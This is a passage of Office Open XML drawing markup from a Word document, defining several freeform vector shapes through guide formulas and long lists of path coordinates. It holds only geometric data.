                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58"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34609545" name="Freeform 35"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5588" y="6109"/>
                            <a:ext cx="36" cy="35"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 16 w 214"/>
                              <a:gd name="T1" fmla="*/ 97 h 214"/>
                              <a:gd name="T2" fmla="*/ 49 w 214"/>
                              <a:gd name="T3" fmla="*/ 39 h 214"/>
                              <a:gd name="T4" fmla="*/ 99 w 214"/>
                              <a:gd name="T5" fmla="*/ 0 h 214"/>
                              <a:gd name="T6" fmla="*/ 148 w 214"/>
                              <a:gd name="T7" fmla="*/ 0 h 214"/>
                              <a:gd name="T8" fmla="*/ 197 w 214"/>
                              <a:gd name="T9" fmla="*/ 39 h 214"/>
                              <a:gd name="T10" fmla="*/ 214 w 214"/>
                              <a:gd name="T11" fmla="*/ 77 h 214"/>
                              <a:gd name="T12" fmla="*/ 214 w 214"/>
                              <a:gd name="T13" fmla="*/ 97 h 214"/>
                              <a:gd name="T14" fmla="*/ 206 w 214"/>
                              <a:gd name="T15" fmla="*/ 97 h 214"/>
                              <a:gd name="T16" fmla="*/ 189 w 214"/>
                              <a:gd name="T17" fmla="*/ 97 h 214"/>
                              <a:gd name="T18" fmla="*/ 115 w 214"/>
                              <a:gd name="T19" fmla="*/ 116 h 214"/>
                              <a:gd name="T20" fmla="*/ 74 w 214"/>
                              <a:gd name="T21" fmla="*/ 136 h 214"/>
                              <a:gd name="T22" fmla="*/ 41 w 214"/>
                              <a:gd name="T23" fmla="*/ 194 h 214"/>
                              <a:gd name="T24" fmla="*/ 25 w 214"/>
                              <a:gd name="T25" fmla="*/ 214 h 214"/>
                              <a:gd name="T26" fmla="*/ 8 w 214"/>
                              <a:gd name="T27" fmla="*/ 194 h 214"/>
                              <a:gd name="T28" fmla="*/ 0 w 214"/>
                              <a:gd name="T29" fmla="*/ 155 h 214"/>
                              <a:gd name="T30" fmla="*/ 1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97"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="49" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="77"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1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898552348" name="Freeform 36"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5558" y="6284"/>
                            <a:ext cx="29" cy="16"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8 w 173"/>
                              <a:gd name="T1" fmla="*/ 59 h 98"/>
                              <a:gd name="T2" fmla="*/ 41 w 173"/>
                              <a:gd name="T3" fmla="*/ 59 h 98"/>
                              <a:gd name="T4" fmla="*/ 74 w 173"/>
                              <a:gd name="T5" fmla="*/ 20 h 98"/>
                              <a:gd name="T6" fmla="*/ 91 w 173"/>
                              <a:gd name="T7" fmla="*/ 0 h 98"/>
                              <a:gd name="T8" fmla="*/ 107 w 173"/>
                              <a:gd name="T9" fmla="*/ 0 h 98"/>
                              <a:gd name="T10" fmla="*/ 165 w 173"/>
                              <a:gd name="T11" fmla="*/ 78 h 98"/>
                              <a:gd name="T12" fmla="*/ 173 w 173"/>
                              <a:gd name="T13" fmla="*/ 78 h 98"/>
                              <a:gd name="T14" fmla="*/ 156 w 173"/>
                              <a:gd name="T15" fmla="*/ 98 h 98"/>
                              <a:gd name="T16" fmla="*/ 107 w 173"/>
                              <a:gd name="T17" fmla="*/ 59 h 98"/>
                              <a:gd name="T18" fmla="*/ 91 w 173"/>
                              <a:gd name="T19" fmla="*/ 59 h 98"/>
                              <a:gd name="T20" fmla="*/ 58 w 173"/>
                              <a:gd name="T21" fmla="*/ 98 h 98"/>
                              <a:gd name="T22" fmla="*/ 17 w 173"/>
                              <a:gd name="T23" fmla="*/ 78 h 98"/>
                              <a:gd name="T24" fmla="*/ 0 w 173"/>
                              <a:gd name="T25" fmla="*/ 59 h 98"/>
                              <a:gd name="T26" fmla="*/ 0 w 173"/>
                              <a:gd name="T27" fmla="*/ 59 h 98"/>
                              <a:gd name="T28" fmla="*/ 8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59"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="41" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8"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703960010" name="Freeform 37"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5559" y="6297"/>
                            <a:ext cx="46" cy="107"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 272"/>
                              <a:gd name="T1" fmla="*/ 20 h 642"/>
                              <a:gd name="T2" fmla="*/ 17 w 272"/>
                              <a:gd name="T3" fmla="*/ 59 h 642"/>
                              <a:gd name="T4" fmla="*/ 49 w 272"/>
                              <a:gd name="T5" fmla="*/ 136 h 642"/>
                              <a:gd name="T6" fmla="*/ 132 w 272"/>
                              <a:gd name="T7" fmla="*/ 331 h 642"/>
                              <a:gd name="T8" fmla="*/ 214 w 272"/>
                              <a:gd name="T9" fmla="*/ 526 h 642"/>
                              <a:gd name="T10" fmla="*/ 247 w 272"/>
                              <a:gd name="T11" fmla="*/ 603 h 642"/>
                              <a:gd name="T12" fmla="*/ 263 w 272"/>
                              <a:gd name="T13" fmla="*/ 642 h 642"/>
                              <a:gd name="T14" fmla="*/ 272 w 272"/>
                              <a:gd name="T15" fmla="*/ 623 h 642"/>
                              <a:gd name="T16" fmla="*/ 272 w 272"/>
                              <a:gd name="T17" fmla="*/ 584 h 642"/>
                              <a:gd name="T18" fmla="*/ 247 w 272"/>
                              <a:gd name="T19" fmla="*/ 409 h 642"/>
                              <a:gd name="T20" fmla="*/ 247 w 272"/>
                              <a:gd name="T21" fmla="*/ 331 h 642"/>
                              <a:gd name="T22" fmla="*/ 255 w 272"/>
                              <a:gd name="T23" fmla="*/ 273 h 642"/>
                              <a:gd name="T24" fmla="*/ 255 w 272"/>
                              <a:gd name="T25" fmla="*/ 253 h 642"/>
                              <a:gd name="T26" fmla="*/ 247 w 272"/>
                              <a:gd name="T27" fmla="*/ 253 h 642"/>
                              <a:gd name="T28" fmla="*/ 198 w 272"/>
                              <a:gd name="T29" fmla="*/ 234 h 642"/>
                              <a:gd name="T30" fmla="*/ 140 w 272"/>
                              <a:gd name="T31" fmla="*/ 175 h 642"/>
                              <a:gd name="T32" fmla="*/ 74 w 272"/>
                              <a:gd name="T33" fmla="*/ 98 h 642"/>
                              <a:gd name="T34" fmla="*/ 25 w 272"/>
                              <a:gd name="T35" fmla="*/ 20 h 642"/>
                              <a:gd name="T36" fmla="*/ 0 w 272"/>
                              <a:gd name="T37" fmla="*/ 0 h 642"/>
                              <a:gd name="T38" fmla="*/ 0 w 272"/>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20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="17" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="198" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25"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2740815" name="Freeform 38"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5601" y="6349"/>
                            <a:ext cx="8" cy="75"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 17 w 50"/>
                              <a:gd name="T1" fmla="*/ 428 h 447"/>
                              <a:gd name="T2" fmla="*/ 0 w 50"/>
                              <a:gd name="T3" fmla="*/ 350 h 447"/>
                              <a:gd name="T4" fmla="*/ 0 w 50"/>
                              <a:gd name="T5" fmla="*/ 311 h 447"/>
                              <a:gd name="T6" fmla="*/ 9 w 50"/>
                              <a:gd name="T7" fmla="*/ 272 h 447"/>
                              <a:gd name="T8" fmla="*/ 17 w 50"/>
                              <a:gd name="T9" fmla="*/ 175 h 447"/>
                              <a:gd name="T10" fmla="*/ 17 w 50"/>
                              <a:gd name="T11" fmla="*/ 58 h 447"/>
                              <a:gd name="T12" fmla="*/ 9 w 50"/>
                              <a:gd name="T13" fmla="*/ 19 h 447"/>
                              <a:gd name="T14" fmla="*/ 17 w 50"/>
                              <a:gd name="T15" fmla="*/ 0 h 447"/>
                              <a:gd name="T16" fmla="*/ 17 w 50"/>
                              <a:gd name="T17" fmla="*/ 0 h 447"/>
                              <a:gd name="T18" fmla="*/ 25 w 50"/>
                              <a:gd name="T19" fmla="*/ 19 h 447"/>
                              <a:gd name="T20" fmla="*/ 42 w 50"/>
                              <a:gd name="T21" fmla="*/ 116 h 447"/>
                              <a:gd name="T22" fmla="*/ 50 w 50"/>
                              <a:gd name="T23" fmla="*/ 233 h 447"/>
                              <a:gd name="T24" fmla="*/ 42 w 50"/>
                              <a:gd name="T25" fmla="*/ 350 h 447"/>
                              <a:gd name="T26" fmla="*/ 25 w 50"/>
                              <a:gd name="T27" fmla="*/ 447 h 447"/>
                              <a:gd name="T28" fmla="*/ 25 w 50"/>
                              <a:gd name="T29" fmla="*/ 447 h 447"/>
                              <a:gd name="T30" fmla="*/ 17 w 50"/>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47">
                                <a:moveTo>
                                  <a:pt x="17" y="428"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17"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827197705" name="Freeform 39"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5629" y="6245"/>
                            <a:ext cx="39" cy="33"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 230 w 230"/>
                              <a:gd name="T1" fmla="*/ 175 h 194"/>
                              <a:gd name="T2" fmla="*/ 181 w 230"/>
                              <a:gd name="T3" fmla="*/ 97 h 194"/>
                              <a:gd name="T4" fmla="*/ 123 w 230"/>
                              <a:gd name="T5" fmla="*/ 19 h 194"/>
                              <a:gd name="T6" fmla="*/ 57 w 230"/>
                              <a:gd name="T7" fmla="*/ 0 h 194"/>
                              <a:gd name="T8" fmla="*/ 32 w 230"/>
                              <a:gd name="T9" fmla="*/ 0 h 194"/>
                              <a:gd name="T10" fmla="*/ 8 w 230"/>
                              <a:gd name="T11" fmla="*/ 39 h 194"/>
                              <a:gd name="T12" fmla="*/ 0 w 230"/>
                              <a:gd name="T13" fmla="*/ 78 h 194"/>
                              <a:gd name="T14" fmla="*/ 0 w 230"/>
                              <a:gd name="T15" fmla="*/ 117 h 194"/>
                              <a:gd name="T16" fmla="*/ 8 w 230"/>
                              <a:gd name="T17" fmla="*/ 136 h 194"/>
                              <a:gd name="T18" fmla="*/ 24 w 230"/>
                              <a:gd name="T19" fmla="*/ 117 h 194"/>
                              <a:gd name="T20" fmla="*/ 65 w 230"/>
                              <a:gd name="T21" fmla="*/ 78 h 194"/>
                              <a:gd name="T22" fmla="*/ 123 w 230"/>
                              <a:gd name="T23" fmla="*/ 97 h 194"/>
                              <a:gd name="T24" fmla="*/ 181 w 230"/>
                              <a:gd name="T25" fmla="*/ 136 h 194"/>
                              <a:gd name="T26" fmla="*/ 222 w 230"/>
                              <a:gd name="T27" fmla="*/ 194 h 194"/>
                              <a:gd name="T28" fmla="*/ 230 w 230"/>
                              <a:gd name="T29" fmla="*/ 194 h 194"/>
                              <a:gd name="T30" fmla="*/ 230 w 230"/>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194">
                                <a:moveTo>
                                  <a:pt x="230" y="175"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="181" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23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011928676" name="Freeform 40"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5665" y="6294"/>
                            <a:ext cx="14" cy="75"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 82 w 82"/>
                              <a:gd name="T1" fmla="*/ 0 h 447"/>
                              <a:gd name="T2" fmla="*/ 57 w 82"/>
                              <a:gd name="T3" fmla="*/ 0 h 447"/>
                              <a:gd name="T4" fmla="*/ 33 w 82"/>
                              <a:gd name="T5" fmla="*/ 58 h 447"/>
                              <a:gd name="T6" fmla="*/ 8 w 82"/>
                              <a:gd name="T7" fmla="*/ 117 h 447"/>
                              <a:gd name="T8" fmla="*/ 0 w 82"/>
                              <a:gd name="T9" fmla="*/ 214 h 447"/>
                              <a:gd name="T10" fmla="*/ 8 w 82"/>
                              <a:gd name="T11" fmla="*/ 311 h 447"/>
                              <a:gd name="T12" fmla="*/ 49 w 82"/>
                              <a:gd name="T13" fmla="*/ 428 h 447"/>
                              <a:gd name="T14" fmla="*/ 57 w 82"/>
                              <a:gd name="T15" fmla="*/ 447 h 447"/>
                              <a:gd name="T16" fmla="*/ 66 w 82"/>
                              <a:gd name="T17" fmla="*/ 447 h 447"/>
                              <a:gd name="T18" fmla="*/ 74 w 82"/>
                              <a:gd name="T19" fmla="*/ 428 h 447"/>
                              <a:gd name="T20" fmla="*/ 66 w 82"/>
                              <a:gd name="T21" fmla="*/ 389 h 447"/>
                              <a:gd name="T22" fmla="*/ 57 w 82"/>
                              <a:gd name="T23" fmla="*/ 311 h 447"/>
                              <a:gd name="T24" fmla="*/ 57 w 82"/>
                              <a:gd name="T25" fmla="*/ 253 h 447"/>
                              <a:gd name="T26" fmla="*/ 66 w 82"/>
                              <a:gd name="T27" fmla="*/ 155 h 447"/>
                              <a:gd name="T28" fmla="*/ 82 w 82"/>
                              <a:gd name="T29" fmla="*/ 78 h 447"/>
                              <a:gd name="T30" fmla="*/ 82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2" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="57" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82"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569893601" name="Freeform 41"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6884" y="6125"/>
                            <a:ext cx="47" cy="110"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 123 w 280"/>
                              <a:gd name="T1" fmla="*/ 58 h 661"/>
                              <a:gd name="T2" fmla="*/ 82 w 280"/>
                              <a:gd name="T3" fmla="*/ 39 h 661"/>
                              <a:gd name="T4" fmla="*/ 49 w 280"/>
                              <a:gd name="T5" fmla="*/ 39 h 661"/>
                              <a:gd name="T6" fmla="*/ 49 w 280"/>
                              <a:gd name="T7" fmla="*/ 97 h 661"/>
                              <a:gd name="T8" fmla="*/ 66 w 280"/>
                              <a:gd name="T9" fmla="*/ 214 h 661"/>
                              <a:gd name="T10" fmla="*/ 58 w 280"/>
                              <a:gd name="T11" fmla="*/ 389 h 661"/>
                              <a:gd name="T12" fmla="*/ 41 w 280"/>
                              <a:gd name="T13" fmla="*/ 506 h 661"/>
                              <a:gd name="T14" fmla="*/ 8 w 280"/>
                              <a:gd name="T15" fmla="*/ 623 h 661"/>
                              <a:gd name="T16" fmla="*/ 0 w 280"/>
                              <a:gd name="T17" fmla="*/ 661 h 661"/>
                              <a:gd name="T18" fmla="*/ 8 w 280"/>
                              <a:gd name="T19" fmla="*/ 661 h 661"/>
                              <a:gd name="T20" fmla="*/ 25 w 280"/>
                              <a:gd name="T21" fmla="*/ 623 h 661"/>
                              <a:gd name="T22" fmla="*/ 58 w 280"/>
                              <a:gd name="T23" fmla="*/ 545 h 661"/>
                              <a:gd name="T24" fmla="*/ 148 w 280"/>
                              <a:gd name="T25" fmla="*/ 350 h 661"/>
                              <a:gd name="T26" fmla="*/ 239 w 280"/>
                              <a:gd name="T27" fmla="*/ 136 h 661"/>
                              <a:gd name="T28" fmla="*/ 263 w 280"/>
                              <a:gd name="T29" fmla="*/ 58 h 661"/>
                              <a:gd name="T30" fmla="*/ 280 w 280"/>
                              <a:gd name="T31" fmla="*/ 19 h 661"/>
                              <a:gd name="T32" fmla="*/ 280 w 280"/>
                              <a:gd name="T33" fmla="*/ 0 h 661"/>
                              <a:gd name="T34" fmla="*/ 272 w 280"/>
                              <a:gd name="T35" fmla="*/ 0 h 661"/>
                              <a:gd name="T36" fmla="*/ 230 w 280"/>
                              <a:gd name="T37" fmla="*/ 19 h 661"/>
                              <a:gd name="T38" fmla="*/ 189 w 280"/>
                              <a:gd name="T39" fmla="*/ 39 h 661"/>
                              <a:gd name="T40" fmla="*/ 148 w 280"/>
                              <a:gd name="T41" fmla="*/ 78 h 661"/>
                              <a:gd name="T42" fmla="*/ 140 w 280"/>
                              <a:gd name="T43" fmla="*/ 78 h 661"/>
                              <a:gd name="T44" fmla="*/ 123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23" y="58"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="82" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123"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854999831" name="Freeform 42"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6939" y="6164"/>
                            <a:ext cx="13" cy="84"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 16 w 74"/>
                              <a:gd name="T1" fmla="*/ 506 h 506"/>
                              <a:gd name="T2" fmla="*/ 57 w 74"/>
                              <a:gd name="T3" fmla="*/ 370 h 506"/>
                              <a:gd name="T4" fmla="*/ 74 w 74"/>
                              <a:gd name="T5" fmla="*/ 234 h 506"/>
                              <a:gd name="T6" fmla="*/ 74 w 74"/>
                              <a:gd name="T7" fmla="*/ 98 h 506"/>
                              <a:gd name="T8" fmla="*/ 49 w 74"/>
                              <a:gd name="T9" fmla="*/ 0 h 506"/>
                              <a:gd name="T10" fmla="*/ 33 w 74"/>
                              <a:gd name="T11" fmla="*/ 0 h 506"/>
                              <a:gd name="T12" fmla="*/ 8 w 74"/>
                              <a:gd name="T13" fmla="*/ 20 h 506"/>
                              <a:gd name="T14" fmla="*/ 0 w 74"/>
                              <a:gd name="T15" fmla="*/ 59 h 506"/>
                              <a:gd name="T16" fmla="*/ 0 w 74"/>
                              <a:gd name="T17" fmla="*/ 98 h 506"/>
                              <a:gd name="T18" fmla="*/ 24 w 74"/>
                              <a:gd name="T19" fmla="*/ 195 h 506"/>
                              <a:gd name="T20" fmla="*/ 41 w 74"/>
                              <a:gd name="T21" fmla="*/ 312 h 506"/>
                              <a:gd name="T22" fmla="*/ 33 w 74"/>
                              <a:gd name="T23" fmla="*/ 409 h 506"/>
                              <a:gd name="T24" fmla="*/ 8 w 74"/>
                              <a:gd name="T25" fmla="*/ 487 h 506"/>
                              <a:gd name="T26" fmla="*/ 8 w 74"/>
                              <a:gd name="T27" fmla="*/ 506 h 506"/>
                              <a:gd name="T28" fmla="*/ 16 w 74"/>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06">
                                <a:moveTo>
                                  <a:pt x="16" y="506"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="57" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="59"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16"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98194024" name="Freeform 43"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6938" y="6109"/>
                            <a:ext cx="36" cy="35"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 206 w 214"/>
                              <a:gd name="T1" fmla="*/ 97 h 214"/>
                              <a:gd name="T2" fmla="*/ 165 w 214"/>
